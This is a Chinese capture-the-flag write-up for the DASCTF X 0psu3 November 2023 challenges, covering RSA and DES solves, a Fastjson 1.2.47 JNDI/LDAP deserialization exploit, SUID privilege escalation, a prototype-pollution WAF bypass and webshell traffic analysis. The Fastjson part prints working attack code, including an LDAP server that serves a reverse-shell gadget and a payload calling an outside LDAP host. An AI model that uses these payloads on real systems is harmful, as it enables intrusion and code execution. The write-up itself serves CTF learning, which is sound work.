Writeup

DASCTF X 0psu3十一月挑战赛 2023

UKFC 2023 DASCTF X 0psu3十一月挑战赛 Writeup

GeneratePrime

某个比赛的同类题,直接脚本解就行了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

n=43090231453250894711427929679917165532091051269639380881822679198388872373018031295429558758883298138388596507242928145888959963579111847255588834248367032580980272245414738073179172684104908272069503607376171584936239696444309039211273376010193165083254209608051430794825261116490356392215410064858020176711199543381037420111454942356936721487016187240237683725310306748046587503625096246489043270381153251813360521583717685413070481576320194446237522118380283335294528606720928637529817170809666802598938788405154468683850385277659812316577873886708164549255359514776884765904417881419804464020855420288884972204146588152412816874161445668955639456202226751519881834234916642218078966066353317917939418964763844067220460513388433020071277477619189495465483910271310025371745344364984826481983188861624474015117761898377237745775289039922285111681410319016537270412509750339539020876501534842403407208957382830000761065368861209033791387480377889838737241326116532852335478193204425626487166234964754732945953080086117315162916374952094149599597509405176646068341218684523765974759907645226607364627690026025662221036766148813918691578120023886400197652148214238256715089883892069133754778609710846757189987335827693169644541734443763194942694587436469448973201513131503797898892822373949177030567791519349220158287318717788746060997955057747930375117780320371517616412423571775682868481089431670802944047375824503353609019686495670630728618082254293585479431369645935654024149490741245953271830453426444847467908952699660750809490650479987
e=65537
c=30862228874892553476569860337345503267926249096036551213683005116620750680365154103242717714230966827288361499342464202425467642950081816675486231250411347472976482409360391136808439034217688010072648722396312121758844966972323513456884732046270240934002095706243044210312663525491282667971502534420245427643076262414036655243117610886157895994101178663474990136516153062956803591842233732498519246731337518545018734984319536536205092573418457928952414660837594265802406473201400259189950484841504227372735345451459452313825309333631615286962304963039625162366186574440146535361888708570569938418676320446653266676364765870547213167058713058609788316647593834008151805692510044158607162858906528913516242904419457446211348504248317409844426309455978985314882123424453618672960876022996245213882467954521212481418830104602302179759479012618982228223244131619557639469872139485197176384683400796204681045965981417650462297978265085323342772310690638049411549216990505001950512428646871875659468885490055363436412364532718888124906227240501145227269727887236864060558999336443165765870556727793253297515155026234234422303238380776900105115890363548589834345888430695886678231459920101695996112312269637459823479947618045447071359886515163416153117176539752947700226596291435270282598638974889205601333097978743387412651687356072223691445472690647184292120882095587563356691450107194982597794937293154289560470269606300576216128045797481404606810315677962659136641943747123985144899464108823536597185386155005111274476874957827391438859327653936


k = 5

R = Zmod(n)["x"]
while True:
    Q = R.quo(R.random_element(k))
    pp = gcd(ZZ(list(Q.random_element() ^ n)[1]), n)
    if pp != 1:
        qq = sum([pp**i for i in range(k)])
        rr = n // (pp * qq)
        assert n == pp * qq * rr
        break
phi = (pp - 1) * (qq - 1) * (rr - 1)
print(phi)
print(pp)
print(qq)
print(rr)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

from Crypto.Util.number import inverse, long_to_bytes

phi = 43090231453250894711427929679917165532091051269639380881822679198388872373018031295429558758883298138388596507242928145888959963579111847255588834248367028366273468151643836519914126746832982858181977832480559114328264886667797986970476864171796785832524621477067457309867434200599533924445061254321537901050420400354298152315118097792575468308230150301898761222745265109066233500161340467187107202416870004331606618655373489166341572378386558894168463864758840129575223159158021859724309385998059712484021722673344530719393756705966685854927288274534462811674369342094104084383158083326891274137775791142876952410090432272998772768811081239147593080081945247139810079791855317914478408223439772207558091946883265599391793939393267857084440321465487983164581640575095777314013837577451968759811643535184836787626318151525932443220030788519564796049221221342089049413878620287776807523305954401010679849482129218871534957442142097916904455869162665912785728770615730041793233462618882943109465790765888771421511565265272679530297097701010243987811103863947279797015559930514590090970895825801137259529861577385773113697749578895919694694019322284159146537713865297003419580273323874845354998176963457507291580541962502065075244898994168721864895474547078305182187606968479006201166186755151343232218223221385734541086066866187876780723333931195076357222752642879771813913798959275450188435289699906464192277657142319307849229977482880844260477420488192163457628950519560112603345655842260693912796012638104905797072943600414518941423520937120
pp = 10223779127743141044678466706179985474302174854457220173103930539918363874691654813758957443858380768641291210108579322612403764648594843444482022290144989
qq = 10925613525868932836004696359497792295984016599196345261875853551051980885655349125106323000598953028734609167276033090484899103884619508277931873054198691707100850707675458684664265511959600179000871541323844832318388481933490434074650079458250707828733615738876931429725863491222560594695247105880497118021666077233713273797244244541954533380469954912655546295442016826255265369507833400702734729398262574988881034834634937849526800727305309072539445574194015377456537136607081829015721615176032413283657255696268433649600646912163534286436736986360641215833943743325904840922419328043303369699912126349066847623421
rr = 385763856108809964522017924218178302786335085110489670572478016108779017092897266135670781527899784280218104364813372137743761522334686332213700040098380500570857814919844864923743971438692580792838223430388444639917743096564931438087875048620634061060035646108558976109969853198810051883812742253553451682676400085252872436075782939199722673952173121385503736246214102522182366086509159781893794193599903876719523563385883931365917415088448587305712218097697158559064617438117832008712279473600085050672911443938359111030383517286933301582722391096186262900979277771007890802827437726133135116009924217030399085463293068567068626252844030021655063702092838208817892484436668568856046628876491938263438827892278968522342994342774433196821793249588710948349180749460294523
n = pp*qq*rr
e = 65537
c=30862228874892553476569860337345503267926249096036551213683005116620750680365154103242717714230966827288361499342464202425467642950081816675486231250411347472976482409360391136808439034217688010072648722396312121758844966972323513456884732046270240934002095706243044210312663525491282667971502534420245427643076262414036655243117610886157895994101178663474990136516153062956803591842233732498519246731337518545018734984319536536205092573418457928952414660837594265802406473201400259189950484841504227372735345451459452313825309333631615286962304963039625162366186574440146535361888708570569938418676320446653266676364765870547213167058713058609788316647593834008151805692510044158607162858906528913516242904419457446211348504248317409844426309455978985314882123424453618672960876022996245213882467954521212481418830104602302179759479012618982228223244131619557639469872139485197176384683400796204681045965981417650462297978265085323342772310690638049411549216990505001950512428646871875659468885490055363436412364532718888124906227240501145227269727887236864060558999336443165765870556727793253297515155026234234422303238380776900105115890363548589834345888430695886678231459920101695996112312269637459823479947618045447071359886515163416153117176539752947700226596291435270282598638974889205601333097978743387412651687356072223691445472690647184292120882095587563356691450107194982597794937293154289560470269606300576216128045797481404606810315677962659136641943747123985144899464108823536597185386155005111274476874957827391438859327653936
d = inverse(e,phi)
print(long_to_bytes(pow(c,d,n)))

ezpython

  • 先编译了一个 pyc 文件修复一下文件头
  • pycdc 反编译,是个 des
  • 然后 iv 的生成有 bug 搞不出来,只能随便构造。密文已知,key 在修复文件头的时候提示了 yuanshen,盲解 des,前 8 位直接猜
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

import pyDes
data = [159, 41, 201, 125, 67, 60, 44, 34, 203, 56, 116, 186, 13, 71, 125, 30, 84, 123, 109, 54, 106, 56, 17, 124, 87,
        236, 25, 12, 80, 178, 165, 123]

key = 'yuanshen'
iv = 'akawdcax'
cipher = pyDes.des(key, pyDes.CBC, iv,pad=None, padmode=pyDes.PAD_PKCS5)
encrypted_data = cipher.decrypt(data)

print(encrypted_data)


print(len('DASCTF{d0_U_4ls0_l1k3_7uansH3n}'))

Ezfastjson

DDOS payload 探测成功,有延时效果

Fastjson 1.2.36 - 1.2.62

1
2
3
4
5
6

{
    "regex":{
        "$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
    },
    "blue":"aaaaaaaaaaaa!"
}

用 1.2.47 的 dns 回显 payload 有发现 dnslog 是有日志的,确定 1.2.47 版本。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

[
  {
    "@type": "java.lang.Class",
    "val": "java.io.ByteArrayOutputStream"
  },
  {
    "@type": "java.io.ByteArrayOutputStream"
  },
  {
    "@type": "java.net.InetSocketAddress"
  {
    "address":,
    "val": "c.bgb5eh.ceye.io"
  }
}
]

这个版本很低了。因此直接用 1.2.47 的缓存绕过打 ldap 本地链子,因为有 fastjson 链子,所以直接用 fastjson 那条链子就能直接打了。

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142

package jndi;

import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import gadget.doubleunser.MyInputStream;
import gadget.memshell.SpringBootMemoryShellOfController;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import util.GadgetUtils;
import util.ReflectionUtils;
import util.SerializerUtils;

import javax.management.BadAttributeValueExpException;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;


public class ldapserver {


    public static void setFieldValue(Object obj, String name, Object value) throws Exception {
        Field f = obj.getClass().getDeclaredField(name);
        f.setAccessible(true);
        f.set(obj, value);
    }
    private static final String <em>LDAP_BASE </em>= "dc=example,dc=com";

    public static void main(String[] tmp_args) throws Exception {

        String[] args = new String[]{"http://127.0.0.1/jndi/#EvilClass"};
        int port = 19001;
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(<em>LDAP_BASE</em>);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen", //$NON-NLS-1$
                    InetAddress.<em>getByName</em>("0.0.0.0"), //$NON-NLS-1$
                    port,
                    ServerSocketFactory.<em>getDefault</em>(),
                    SocketFactory.<em>getDefault</em>(),
                    (SSLSocketFactory) SSLSocketFactory.<em>getDefault</em>()));
            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[0])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.<em>out</em>.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
            ds.startListening();

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        <em>/**</em>
<em>         *</em>
<em>         */</em>
<em>        </em>public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }

        <em>/**</em>
<em>         * {</em><strong>@inheritDoc</strong><em>}</em>
<em>         *</em>
<em>         * </em><strong>@see </strong><em>com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)</em>
<em>         */</em>
<em>        </em>@Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            } catch (Exception e1) {
                e1.printStackTrace();
            }

        }

        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {

            List<Object> list = new ArrayList<>();

            TemplatesImpl templates = GadgetUtils.<em>getTemplatesImplReverseShell</em>();

            list.add(templates);          //第一次添加为了使得templates变成引用类型从而绕过JsonArray的resolveClass黑名单检测

            JSONArray jsonArray = new JSONArray();
            jsonArray.add(templates);           //此时在handles这个hash表中查到了映射,后续则会以引用形式输出

            BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
            ReflectionUtils.<em>setFieldValue</em>(bd,"val",jsonArray);

            list.add(bd);

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeObject(list);
            objectOutputStream.close();

            //jdk8u191之后
            e.addAttribute("javaClassName", "foo");
            //getObject获取Gadget

            e.addAttribute("javaSerializedData", byteArrayOutputStream.toByteArray());

            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.<em>SUCCESS</em>));
        }
    }

}

发送 exp 触发 server 反序列化。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://114.67.236.137:19001/",
        "autoCommit":true
    }
 
}

比较奇怪的是打了两次都没收到反弹 shell,见鬼了。

但是看 log 实际上是已经实例化任意类的,能出网但就是收不到反弹 shell。

直接打内存马倒是打通了。

读 flag 发现没权限,猜测是典中典之 suid 提权。

1

find / -user root -perm -4000 -print 2>/dev/null

果然输出了一条 eqn,虽然不知道是什么命令但是直接 eqn /flag 就收到 flag 了。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

.if !'\*(.T'ps' .if !'\*(.T'html' .tm warning: eqn should have been given a `-T\*(.T' option
.if '\*(.T'html' .if !'ps'ps' .tm warning: eqn should have been given a `-Tps' option
.if '\*(.T'html' .if !'ps'ps' .tm warning: (it is advisable to invoke groff via: groff -Thtml -e)
.lf 1 /usr/share/groff/1.22.3/tmac/eqnrc
.\" -*- nroff -*-
.\"
.\" Startup file for eqn.
.if !d EQ .ds EQ
.if !d EN .ds EN
.EQ
.nr 0C \n(.C
.cp 0
.ds 10
.cp \n(0C
.lf 67
.EN
.lf 1 /flag
DASCTF{6625324024294f0585108782f359acd5}

EzPenetration

WordPress 5.8.3

?rest_route=/wp/v2/users

用户名 yanshu

应该是有个 sql 注入。

https://xz.aliyun.com/t/10841#toc-2

Realrce

首先要想办法 bypass 这个 WAF。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

function waf(input_code) {
    bypasspin = /%[0-9a-fA-F]{2}/i;
    const bypasscode = bypasspin.test(input_code);
    if (bypasscode) {
        try {
            return waf(decodeURIComponent(input_code)); //
        } catch (error) {
            console.error("Error decoding input: ", error);
            return false;
        }
    }
    const blacklist = [/__proto__/i, /constructor/i, /prototype/i];
    for (const blackword of blacklist) {
        if (blackword.test(input_code)) {
            return true;
        }
    }
    return false;
}

这里太明显了,bypasscode 检测到 url 就调用 decodeURIComponent 解码,解码错误直接返回 false。直接搞一个奇怪的 url 编码让他解不出来走到 catch 那里即可绕过 waf。

1
2
3

{"msg":{"cmd_rce":"ls","__proto__":{"cmd_rce":"env"},
"%Afa%c":"a"
},"djvcvp707s":"="}

之后还有个 waf,但是 env 非预期拿到 flag。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

Result: npm_config_node_gyp=/usr/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js
npm_execpath=/usr/lib/node_modules/npm/bin/npm-cli.js
_=/usr/bin/env
HOSTNAME=out
EDITOR=vi
npm_config_global_prefix=/usr
npm_package_json=/app/package.json
npm_config_user_agent=npm/8.19.4 node/v16.20.2 linux x64 workspaces/false
npm_config_init_module=/root/.npm-init.js
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.240.0.1
npm_config_userconfig=/root/.npmrc
npm_lifecycle_event=start
KUBERNETES_PORT=tcp://10.240.0.1:443
PWD=/app
HOME=/root
npm_config_cache=/root/.npm
npm_command=run-script
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP_PORT=443
npm_config_noproxy=
KUBERNETES_PORT_443_TCP=tcp://10.240.0.1:443
npm_config_metrics_registry=https://registry.npmjs.org/
npm_config_globalconfig=/usr/etc/npmrc
npm_lifecycle_script=node app.js
INIT_CWD=/app
FLAG=DASCTF{100fec57-9090-4a5a-b1a5-bdc4eb09cf9f}
COLOR=0
cmd_rce=env
SHLVL=3
npm_config_prefix=/usr
npm_node_execpath=/usr/bin/node
KUBERNETES_SERVICE_PORT=443
npm_config_local_prefix=/app
npm_package_version=1.0.0
PATH=/app/node_modules/.bin:/node_modules/.bin:/usr/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
NODE=/usr/bin/node
KUBERNETES_SERVICE_HOST=10.240.0.1
npm_package_name=app

不过应该是不是还有个非预期。我没有尝试,这个 express 的静态目录也可以被污染吧?直接污染成/然后从 web 目录访问 flag 是不是也可以。

1

app.use('/images', express.static('/app/static'));

IceTea

这四个 http 流量挨个看一遍。攻击者上传了一个 webshell,简单看了一下 webshell,做了一些混淆。比如在前面添加混淆字符不让 base64 顺利解码,把混淆字符删掉就能解来明文了。

关键的回显就是下面:

调用该文件并读取 flag 最终输出。

1
2
3
4
5

cd "/www/wwwroot/DAS202310.com";./ezbase e flag.txt IceTea.txt;echo 27d667b0c949;pwd;echo f0e52b6ed�׼ᦶ姷w1

reftqRrg4QB9zvZQzwf50xn51CZQxSf51gZPzxj5zhjF1CI75qE=27d667b0c949
/www/wwwroot/DAS202310.com
f0e52b6ed

得出结论./ezbase e flag.txt IceTea.txt; 的输出是 reftqRrg4QB9zvZQzwf50xn51CZQxSf51gZPzxj5zhjF1CI75qE=

根据代码提取出来 ezbase。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

<?php
$f="ezbase";
echo $f;
$c="7F454C4602010100000000000000000002003E00010000005053600000000000400000000000000000000000000000000000000040003800030000000000000001000000060000000000000000000000000040000000000000004000000000000010000000000000C82020000000000000200000000000000100000005000000000000000000000000406000000000000040600000000000041E000000000000041E000000000000002000000000000051E57464060000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000005DE48E0E55505821BC0A0E1600000000F03300002F13000038020000BE00000002000000FBFB21FF7F454C460201010002003E000DB005400FBB64BF170500702C22133800DDB2EEBB09051E001B00060F05270740E4843C21F801000800E47B9BEE03030438020D0740019990271C0000017C60037B6F8D07A412007EC9B684002037AB101ECF4EC8F70D0760B10237B8029B0C722102280792C126A460D0DFD0D24D061904540740834CC813440000045009F9DEEFE574640B2C100D0740678664B074377451A7E77B23B0005E6F52F066030917F0D707000080848740020000FF6C1000006C100000000000002F6C696236342F6C642D6C696E75782D7838362D36342E736F2E3200040000001000000001000000474E550000000000020000000600000020000000040000001400000003000000474E5500BEEE3A1D91BE69163ED3C0A9BE2C52D94BBB06D501000000010000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000012000000000000000000000000000000000000002900000012000000000000000000000000000000000000001600000012000000000000000000000000000000000000001D00000012000000000000000000000000000000000000002300000012000000000000000000000000000000000000003000000012000000000000000000000000000000000000004200000020000000000000000000000000000000000000000B0000001200000000000000000000000000000000000000006C6962632E736F2E3600666F70656E0070757473007072696E74660066676574630066707574630066636C6F7365005F5F6C6962635F73746172745F6D61696E005F5F676D6F6E5F73746172745F5F00474C4942435F322E322E35000000000200020002000200020002000000020001000100010000001000000000000000751A6909000002005100000000000000F81F600000000000060000000700000000000000000000001820600000000000070000000100000000000000000000002020600000000000070000000200000000000000000000002820600000000000070000000300000000000000000000003020600000000000070000000400000000000000000000003820600000000000070000000500000000000000000000004020600000000000070000000600000000000000000000004820600000000000070000000700000000000000000000005020600000000000070000000800000000000000000000004883EC08488B05F51A20004885C07405E8830000004883C408C30000000000000000000000000000FF35E21A2000FF25E41A20000F1F4000FF25E21A20006800000000E9E0FFFFFFFF25DA1A20006801000000E9D0FFFFFFFF25D21A20006802000000E9C0FFFFFFFF25CA1A20006803000000E9B0FFFFFFFF25C21A20006804000000E9A0FFFFFFFF25BA1A20006805000000E990FFFFFFFF25B21A20006806000000E980FFFFFFFF25AA1A20006807000000E970FFFFFF31ED4989D15E4889E24883E4F0505449C7C0A00F400048C7C1300F400048C7C79D064000E8A7FFFFFFF4660F1F440000B8CF20600055482DC82060004883F80E4889E577025DC3B8000000004885C074F45DBFC8206000FFE00F1F8000000000B8C820600055482DC820600048C1F8034889E54889C248C1EA3F4801D048D1F875025DC3BA000000004885D274F45D4889C6BFC8206000FFE20F1F8000000000803D6A1A2000007511554889E5E87EFFFFFF5DC605571A200001F3C30F1F400048833DA817200000741EB8000000004885C0741455BF201E60004889E5FFD05DE97BFFFFFF0F1F00E973FFFFFF554889E54883EC20897DEC488975E0C645FF20837DEC017E1B488B45E04883C008488B000FB6000FBEC089C7E8920000008845FF837DEC037F1D807DFF627417807DFF747411BFC00F4000E843FEFFFFB801000000EB6AC745F8000000000FBE45FF83F8657530BFF00F4000E822FEFFFF488B45E04883C018488B10488B45E04883C010488B004889D64889C7E8100400008945F8EB11BFFA0F4000E8F2FDFFFFC745F8FFFFFFFF8B45F889C6BF0A104000B800000000E8F7FDFFFFB800000000C9C3554889E5897DFC837DFC407E0A837DFC5A7F04834DFC208B45FC5DC3554889E5897DFC837DFC2B7507B83E000000EB5B837DFC2F7507B83F000000EB4E837DFC3D7507B840000000EB41837DFC2F760E837DFC3977088B45FC83C004EB2D837DFC40760E837DFC5A77088B45FC83E841EB19837DFC60760E837DFC7A77088B45FC83E847EB05B8000000005DC3554889E5897DECC745F800000000C745FC00000000EB298B4DFCBA5655555589C8F7EA89C8C1F81F29C289D001C001D029C189CA85D275048345F8018345FC018B45FC3B45EC72CF8B45F8C1E0025DC3554889E5897DFC8B55FC89D001C001D0C1E8025DC3554889E548897DD88975D4488955C8C745FC00000000C745F800000000C745F400000000C745FC00000000E9DC0000008B45F88D50018955F88B4DFC488B55D84801CA0FB6120FB6D289C0895485E0837DF8030F85AF0000008B55F4488B45C84801C28B45E00FB6C0C1E80289C00FB6808020600088028B45F483C00189C2488B45C84801C28B45E083E003C1E00489C18B45E425F0000000C1E80401C889C00FB6808020600088028B45F483C00289C2488B45C84801C28B45E483E00F8D0C85000000008B45E825C0000000C1E80601C889C00FB6808020600088028B45F483C00389C2488B45C84801C28B45E883E03F89C00FB680802060008802C745F8000000008345F4048345FC018B45FC3B45D40F8218FFFFFF837DF8000F84B0000000837DF8017507C745E4000000008B55F4488B45C84801C28B45E00FB6C0C1E80289C00FB6808020600088028B45F483C00189C2488B45C84801C28B45E083E003C1E00489C18B45E425F0000000C1E80401C889C00FB680802060008802837DF80275258B45F483C00289C2488B45C84801C28B45E483E00FC1E00289C00FB680802060008802EB128B45F483C00289C2488B45C84801D0C6003D8B45F483C00389C2488B45C84801D0C6003D8345F4048B55F4488B45C84801D0C600008B45F45DC3554889E5534883EC3848897DD08975CC488955C0C745F400000000C745F000000000C745EC00000000C745F400000000E9BE0000008B5DF08D43018945F08B55F4488B45D04801D00FB6000FB6C089C7E8F1FCFFFF89DA894495D8837DF0040F858A0000008B55EC488B45C04801D08B55D88D0C95000000008B55DC83E230C1EA0401CA88108B45E083F84074568B45EC83C00189C2488B45C04801D08B55DC89D1C1E1048B55E083E23CC1EA0201CA88108B45E483F84074248B45EC83C00289C2488B45C04801D08B55E089D1C1E1068B55E401CA88108345EC03EB0A8345EC02EB048345EC01C745F0000000008345F4018B45F43B45CC0F8236FFFFFF8B45EC4883C4385B5DC3554889E54883EC4048897DC8488975C0488B45C8BE261040004889C7E840FAFFFF488945E8488B45C0BE291040004889C7E82BFAFFFF488945E0C745FC00000000C745F800000000C745F40000000048837DE800740748837DE000753048837DE800740C488B45E84889C7E891F9FFFF48837DE000740C488B45E04889C7E87EF9FFFFB800000000E9D1010000E9EA000000488B45E84889C7E883F9FFFF8945F4837DF4FF7505E9DA0000008B45F88D50018955F889C08B55F4895485D0837DF8030F85B40000008B45D00FB6C0C1E80289C00FB680802060000FB6C0488B55E04889D689C7E846F9FFFF8B45D083E003C1E00489C28B45D425F0000000C1E80401D089C00FB680802060000FB6C0488B55E04889D689C7E814F9FFFF8B45D483E00F8D1485000000008B45D825C0000000C1E80601D089C00FB680802060000FB6C0488B55E04889D689C7E8E0F8FFFF8B45D883E03F89C00FB680802060000FB6C0488B55E04889D689C7E8C0F8FFFFC745F8000000008345FC04837DF4FF0F850CFFFFFF837DF8000F84B3000000837DF8017507C745D4000000008B45D00FB6C0C1E80289C00FB680802060000FB6C0488B55E04889D689C7E871F8FFFF8B45D083E003C1E00489C28B45D425F0000000C1E80401D089C00FB680802060000FB6C0488B55E04889D689C7E83FF8FFFF837DF80275258B45D483E00FC1E00289C00FB680802060000FB6C0488B55E04889D689C7E816F8FFFFEB11488B45E04889C6BF3D000000E803F8FFFF488B45E04889C6BF3D000000E8F2F7FFFF8345FC04488B45E84889C7E8B2F7FFFF488B45E04889C7E8A6F7FFFF8B45FCC9C3554889E5534883EC4848897DB8488975B0488B45B8BE261040004889C7E8DFF7FFFF488945D8488B45B0BE291040004889C7E8CAF7FFFF488945D0C745EC00000000C745E800000000C745E40000000048837DD800740748837DD000753048837DD800740C488B45D84889C7E830F7FFFF48837DD000740C488B45D04889C7E81DF7FFFFB800000000E9F2000000E9C8000000488B45D84889C7E822F7FFFF8945EC837DECFF7505E9B80000008B5DE88D43018945E88B45EC89C7E81DF9FFFF89DA894495C0837DE8040F858B0000008B45C00FB6C08D1485000000008B45C483E030C1E80401D0488B55D04889D689C7E8DBF6FFFF8B45C883F84074528B45C4C1E0040FB6C08B55C883E23CC1EA0201D0488B55D04889D689C7E8B1F6FFFF8B45CC83F84074228B45C8C1E0060FB6D08B45CC01D0488B55D04889D689C7E88DF6FFFF8345E403EB0A8345E402EB048345E401C745E800000000837DECFF0F852EFFFFFF488B45D84889C7E830F6FFFF488B45D04889C7E824F6FFFF8B45E44883C4485B5DC3662E0F1F84000000000041574189FF41564989F641554989D541544C8D25C80E200055488D2DC80E2000534C29E531DB48C1FD034883EC08E895F5FFFF4885ED741E0F1F8400000000004C89EA4C89F64489FF41FF14DC4883C3014839EB75EA4883C4085B5D415C415D415E415FC390662E0F1F840000000000F3C300004883EC084883C408C3000000010002000000000000000000000000000A4552524F523A20696E73756666696369656E74206F7220696E636F727265637420706172616D65746572732E2E2E000A454E434F44494E47000A494E56414C4944204F5054494F4E000A427974657320656E636F6465642F6465636F6465643A2025690A00726200776200011B033B700000000D000000F4F4FFFFBC00000084F5FFFF8C00000071F6FFFFE400000034F7FFFF0401000050F7FFFF24010000C1F7FFFF4401000011F8FFFF6401000026F8FFFF840100000AFAFFFFA401000013FBFFFFCC01000073FDFFFFEC01000004FFFFFF1402000074FFFFFF5C0200001400000000000000017A5200017810011B0C070890010710140000001C000000F0F4FFFF2A00000000000000000000001400000000000000017A5200017810011B0C070890010000240000001C00000030F4FFFF90000000000E10460E184A0F0B770880003F1A3B2A332422000000001C0000004400000085F5FFFFC300000000410E108602430D0602BE0C070800001C0000006400000028F6FFFF1C00000000410E108602430D06570C07080000001C0000008400000024F6FFFF7100000000410E108602430D06026C0C070800001C000000A400000075F6FFFF5000000000410E108602430D06024B0C070800001C000000C4000000A5F6FFFF1500000000410E108602430D06500C07080000001C000000E40000009AF6FFFFE401000000410E108602430D0603DF010C07080024000000040100005EF8FFFF0901000000410E108602430D0645830302FF0C0708000000000000001C0000002C0100003FF9FFFF6002000000410E108602430D06035B020C070800240000004C0100007FFBFFFF8701000000410E108602430D06458303037D010C07080000000000004400000074010000E8FCFFFF6500000000420E108F02450E188E03450E208D04450E288C05480E308606480E3883074D0E406C0E38410E30410E28420E20420E18420E10420E080014000000BC01000010FDFFFF02000000000000000000000000000000B1020000F9000000020000006CB2D9F370064000500700010764E4C1860C0FF804400DC8839C1CA40F19101E60830D36C81B08071A1F18BF0FC9201CF5FEFF6F4F9802E4EC20270590030F0620839D1CB8020A5F5D091B6CC80B0715CD2067876C0803207F02830C32D8C0EF1407176CB2C9203817200F16B2211B086F090FCE84D9C9B3CF0004FF0F4F44F6069BF00FEEDF0076CA260C287F0036058720830C7646075666830C32C8768696A6FFFF8BB005BF6162636465666768696A6B6C6D6E6F70FFFFFFFF7172737475767778797A303132333435363738394142434445464748494A4B4C0080FFFF4D4E4F505152535455565758595A2B2F000200000000000040FF00000100004C1300005052E871020000555351524801FE564889FE4889D731DB31C94883CDFFE85000000001DB7402F3C38B1E4883EEFC11DB8A16F3C3488D042F83F9058A1076214883FDFC771B83E9048B104883C00483E9048917488D7F0473EF83C1048A10741048FFC0881783E9018A10488D7F0175F0F3C3FC415B4180F8020F8587000000EB0848FFC6881748FFC78A1601DB750A8B1E4883EEFC11DB8A1672E68D410141FFD311C001DB750A8B1E4883EEFC11DB8A1673EB83E8037217C1E0080FB6D209D048FFC683F0FF0F843C0000004863E88D410141FFD311C941FFD311C9751889C183C00241FFD311C901DB75088B1E4883EEFC11DB73ED4881FD00F3FFFF11C1E830FFFFFFEB83575E594889F04829C85A4829D75989395B5DC3681E0000005AE8C300000050524F545F455845437C50524F545F5752495445206661696C65642E0A000A0024496E666F3A20546869732066